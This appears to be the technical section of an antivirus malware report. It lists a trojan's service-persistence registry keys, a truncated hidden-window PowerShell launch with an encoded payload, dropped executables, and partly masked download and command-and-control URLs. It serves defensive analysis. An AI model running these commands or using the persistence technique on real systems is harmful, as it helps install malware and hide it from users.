Technical Information
- [<HKLM>\System\CurrentControlSet\Services\inetmsg] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\inetmsg] 'ImagePath' = '"%WINDIR%\SysWOW64\inetmsg.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABBAHoAeQB0AGoAaAB6AGcAYQB1AG0AaQBnAD0AJwBOAHYAeABkAHgAZwBjAGMAYgBuAGcAJwA7ACQATgBuAHkAagB0AGgAYwByAHoAagBvAHkAdgAgAD0AIAAnADkAMwA3ACcAOwAkAEkAaQBxAHMAZgBwAHMAbQA9ACcAUgBvAGcAeAB...
- %HOMEPATH%\937.exe
- from %HOMEPATH%\937.exe to %WINDIR%\syswow64\inetmsg.exe
- http://ah#.#rbdev.com/wp-admin/qp0/
- http://68.##4.229.171/qX9k4uNlSxr7c
- DNS ASK ah#.#rbdev.com
- '%HOMEPATH%\937.exe'
- '%WINDIR%\syswow64\inetmsg.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABBAHoAeQB0AGoAaAB6AGcAYQB1AG0AaQBnAD0AJwBOAHYAeABkAHgAZwBjAGMAYgBuAGcAJwA7ACQATgBuAHkAagB0AGgAYwByAHoAagBvAHkAdgAgAD0AIAAnADkAMwA3ACcAOwAkAEkAaQBxAHMAZgBwAHMAbQA9ACcAUgBvAGcAeAB...' (with hidden window)